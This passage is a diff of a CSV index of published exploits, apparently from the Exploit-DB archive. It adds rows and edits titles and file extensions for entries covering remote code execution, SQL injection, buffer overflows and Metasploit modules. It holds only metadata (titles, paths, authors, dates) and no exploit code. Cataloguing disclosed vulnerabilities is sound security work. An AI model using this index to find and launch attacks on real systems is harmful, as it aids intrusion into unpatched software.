Accossatto",remote,windows, +38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Remote Stack Buffer Overflow",2013-08-28,"Marcos Accossatto",remote,windows, 38764,exploits/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,remote,hardware,443 38766,exploits/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",remote,multiple, 38797,exploits/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,remote,php,80 @@ -15601,6 +15603,7 @@ id,file,description,date,author,type,platform,port 39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",remote,windows, 39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",remote,multiple, 39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",remote,hardware, +39102,exploits/windows/remote/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,remote,windows, 39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",remote,ios, 39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,remote,multiple, 39119,exploits/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",remote,windows, @@ -15679,6 +15682,7 @@ id,file,description,date,author,type,platform,port 39985,exploits/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",remote,windows,1604 39999,exploits/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,remote,win_x86-64,21 40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,remote,php,80 +40043,exploits/windows/remote/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",remote,windows, 40064,exploits/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",remote,linux, 40067,exploits/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution (Metasploit)",2016-07-06,Metasploit,remote,linux,80 40108,exploits/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,remote,linux,443 @@ -15922,7 +15926,7 @@ id,file,description,date,author,type,platform,port 42630,exploits/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Remote Buffer Overflow (Metasploit)",2017-09-07,Metasploit,remote,windows,80 42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375 42683,exploits/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,remote,windows, -42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42691,exploits/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42692,exploits/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,php, 42693,exploits/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42694,exploits/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,46824 @@ -15930,7 +15934,7 @@ id,file,description,date,author,type,platform,port 42696,exploits/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows,3814 42697,exploits/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",remote,linux, 42698,exploits/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",remote,jsp, -42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, +42700,exploits/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, 42701,exploits/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, 42702,exploits/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",remote,java, 42703,exploits/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",remote,windows, @@ -15988,6 +15992,7 @@ id,file,description,date,author,type,platform,port 43145,exploits/windows/remote/43145.py,"Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow",2017-11-14,sickness,remote,windows,80 42886,exploits/windows/remote/42886.py,"Sync Breeze Enterprise 10.1.16 - 'POST' Remote Buffer Overflow",2017-10-20,mschenk,remote,windows, 43163,exploits/windows/remote/43163.txt,"Microsoft Office - OLE Remote Code Execution",2017-11-20,embedi,remote,windows, +43193,exploits/unix/remote/43193.rb,"pfSense - Authenticated Group Member Remote Command Execution (Metasploit)",2017-11-29,Metasploit,remote,unix,443 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -21424,7 +21429,7 @@ id,file,description,date,author,type,platform,port 9028,exploits/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, 9030,exploits/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",webapps,php, 9032,exploits/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",webapps,php, -9035,exploits/php/webapps/9035.txt,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,webapps,php, +9035,exploits/php/webapps/9035.php,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,webapps,php, 9036,exploits/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php?t' Local File Inclusion",2009-06-29,ahmadbady,webapps,php, 9037,exploits/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",webapps,php, 9040,exploits/php/webapps/9040.txt,"Joomla! Component com_bookflip - 'book_id' SQL Injection",2009-06-29,boom3rang,webapps,php, @@ -24804,7 +24809,7 @@ id,file,description,date,author,type,platform,port 17094,exploits/php/webapps/17094.html,"Allomani Web Links 1.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, 17095,exploits/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, 17096,exploits/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,AtT4CKxT3rR0r1ST,webapps,php, -17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,webapps,php, +17123,exploits/php/webapps/17123.txt,"Tutorialms 1.4 - 'show' SQL Injection",2011-04-05,LiquidWorm,webapps,php, 17098,exploits/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",webapps,php, 17099,exploits/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",webapps,php, 17100,exploits/php/webapps/17100.txt,"spidaNews 1.0 - 'news.php?id' SQL Injection",2011-04-02,"Easy Laster",webapps,php, @@ -24923,6 +24928,7 @@ id,file,description,date,author,type,platform,port 17347,exploits/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,webapps,php, 17349,exploits/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed",2011-05-30,Aodrulez,webapps,hardware, 17350,exploits/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,webapps,php, +43191,exploits/php/webapps/43191.py,"osCommerce 2.3.4.1 - Arbitrary File Upload",2017-11-11,"Simon Scannell",webapps,php, 17360,exploits/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,webapps,windows, 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php, 17375,exploits/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,webapps,asp, @@ -25930,7 +25936,7 @@ id,file,description,date,author,type,platform,port 21269,exploits/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, 21270,exploits/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, 21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php, -21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,webapps,asp, +21272,exploits/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.0 - SQL Injection",2012-09-12,Vulnerability-Lab,webapps,asp, 21273,exploits/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",webapps,php, 21277,exploits/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,webapps,php, 21278,exploits/php/webapps/21278.txt,"Portix-PHP 0.4 - 'view.php' Directory Traversal",2002-02-04,frog,webapps,php, @@ -36282,7 +36288,7 @@ id,file,description,date,author,type,platform,port 38746,exploits/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",webapps,php, 38748,exploits/php/webapps/38748.txt,"dBlog CMS - 'm' SQL Injection",2013-09-03,ACC3SS,webapps,php, 38749,exploits/asp/webapps/38749.txt,"Flo CMS - 'archivem' SQL Injection",2013-09-03,ACC3SS,webapps,asp, -38750,exploits/php/webapps/38750.txt,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",webapps,php, +38750,exploits/php/webapps/38750.md,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",webapps,php, 38753,exploits/php/webapps/38753.html,"WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,webapps,php, 38754,exploits/php/webapps/38754.txt,"eTransfer Lite - 'file name' HTML Injection",2013-09-10,"Benjamin Kunz Mejri",webapps,php, 38755,exploits/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' SQL Injection",2013-09-13,"Ashiyane Digital Security Team",webapps,php, @@ -36538,7 +36544,7 @@ id,file,description,date,author,type,platform,port 39239,exploits/php/webapps/39239.txt,"xClassified - 'ads.php' SQL Injection",2014-07-07,Lazmania61,webapps,php, 39240,exploits/php/webapps/39240.txt,"WordPress Plugin BSK PDF Manager - '/wp-admin/admin.php' Multiple SQL Injections",2014-07-09,"Claudio Viviani",webapps,php, 39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848 -39243,exploits/php/webapps/39243.txt,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,webapps,php,80 +39243,exploits/php/webapps/39243.md,"phpDolphin 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,webapps,php,80 39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80 39246,exploits/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",webapps,php,80 39250,exploits/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,webapps,php, @@ -36875,7 +36881,7 @@ id,file,description,date,author,type,platform,port 40060,exploits/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",webapps,jsp,80 40062,exploits/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",webapps,php,80 40063,exploits/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",webapps,cgi,80 -40065,exploits/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,webapps,jsp,80 +40065,exploits/jsp/webapps/40065.md,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,webapps,jsp,80 40068,exploits/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",webapps,php,80 40070,exploits/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",webapps,php,80 40076,exploits/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",webapps,php,80 @@ -37104,7 +37110,7 @@ id,file,description,date,author,type,platform,port 40852,exploits/php/webapps/40852.txt,"Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection",2016-09-16,"Larry W. Cashdollar",webapps,php, 40853,exploits/hardware/webapps/40853.txt,"Xfinity Gateway - Cross-Site Request Forgery",2016-11-30,Pabstersac,webapps,hardware, 40856,exploits/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",webapps,hardware, -40877,exploits/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, +40877,exploits/php/webapps/40877.md,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",webapps,php, 40887,exploits/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,webapps,hardware, 40889,exploits/cgi/webapps/40889.txt,"NETGEAR R7000 - Command Injection",2016-12-07,Acew0rm,webapps,cgi, 40898,exploits/hardware/webapps/40898.txt,"NETGEAR R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",webapps,hardware, @@ -37248,7 +37254,7 @@ id,file,description,date,author,type,platform,port 41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux, 41143,exploits/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",webapps,php, 41147,exploits/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",webapps,hardware, -41150,exploits/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80 +41150,exploits/php/webapps/41150.md,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80 41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php, 41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php, 41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php, @@ -37636,8 +37642,8 @@ id,file,description,date,author,type,platform,port 41733,exploits/php/webapps/41733.txt,"Tour Package Booking 1.0 - SQL Injection",2017-03-26,"Ihsan Sencan",webapps,php, 41735,exploits/php/webapps/41735.txt,"Professional Bus Booking Script - 'hid_Busid' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, 41736,exploits/php/webapps/41736.txt,"CouponPHP CMS 3.1 - 'code' SQL Injection",2017-03-27,"Ihsan Sencan",webapps,php, -41746,exploits/php/webapps/41746.txt,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,webapps,php, -41747,exploits/php/webapps/41747.txt,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,webapps,php, +41746,exploits/php/webapps/41746.md,"EyesOfNetwork (EON) 5.0 - Remote Code Execution",2017-03-27,Sysdream,webapps,php, +41747,exploits/php/webapps/41747.md,"EyesOfNetwork (EON) 5.0 - SQL Injection",2017-03-27,Sysdream,webapps,php, 41748,exploits/jsp/webapps/41748.rb,"Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)",2017-03-27,Sysdream,webapps,jsp, 41749,exploits/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",webapps,php, 41758,exploits/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' SQL Injection",2017-03-29,"Ihsan Sencan",webapps,php, @@ -37720,7 +37726,7 @@ id,file,description,date,author,type,platform,port 41962,exploits/linux/webapps/41962.sh,"WordPress 4.6 - Unauthenticated Remote Code Execution",2017-05-03,"Dawid Golunski",webapps,linux, 41963,exploits/linux/webapps/41963.txt,"WordPress < 4.7.4 - Unauthorized Password Reset",2017-05-03,"Dawid Golunski",webapps,linux, 41966,exploits/php/webapps/41966.txt,"WordPress Plugin WebDorado Gallery 1.3.29 - SQL Injection",2017-05-05,defensecode,webapps,php,80 -41967,exploits/php/webapps/41967.txt,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 +41967,exploits/php/webapps/41967.md,"ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities",2017-05-05,Sysdream,webapps,php,80 41976,exploits/linux/webapps/41976.py,"LogRhythm Network Monitor - Authentication Bypass / Command Injection",2017-04-24,"Francesco Oddo",webapps,linux, 41979,exploits/php/webapps/41979.txt,"I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting",2017-05-09,"SEC Consult",webapps,php, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx, @@ -37901,7 +37907,7 @@ id,file,description,date,author,type,platform,port 42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, -42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, +42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution",2017-08-18,"Philip Pettersson",webapps,jsp, 42492,exploits/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42493,exploits/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, 42494,exploits/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php, @@ -38099,8 +38105,8 @@ id,file,description,date,author,type,platform,port 42927,exploits/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",webapps,php, 42931,exploits/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",webapps,hardware, 42933,exploits/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",webapps,hardware, -42934,exploits/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,webapps,php, -42935,exploits/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,webapps,php, +42934,exploits/php/webapps/42934.md,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,webapps,php, +42935,exploits/php/webapps/42935.md,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,webapps,php, 42939,exploits/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, 42940,exploits/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",webapps,jsp, 42947,exploits/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,webapps,hardware, @@ -38227,4 +38233,5 @@ id,file,description,date,author,type,platform,port 43158,exploits/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",webapps,hardware, 43177,exploits/multiple/webapps/43177.txt,"CommuniGatePro 6.1.16 - Cross-Site Scripting",2017-11-15,"Boumediene KADDOUR",webapps,multiple, 43188,exploits/hardware/webapps/43188.txt,"ZTE ZXDSL 831CII - Improper Access Restrictions",2017-11-27,"Ibad Shah",webapps,hardware, -43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Remote Root Command Execution",2017-11-28,SecuriTeam,webapps,cgi, +43190,exploits/cgi/webapps/43190.py,"Synology StorageManager 5.2 - Root Remote Command Execution",2017-11-28,SecuriTeam,webapps,cgi, +43196,exploits/php/webapps/43196.txt,"WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal",2017-11-28,Fu2x2000,webapps,php,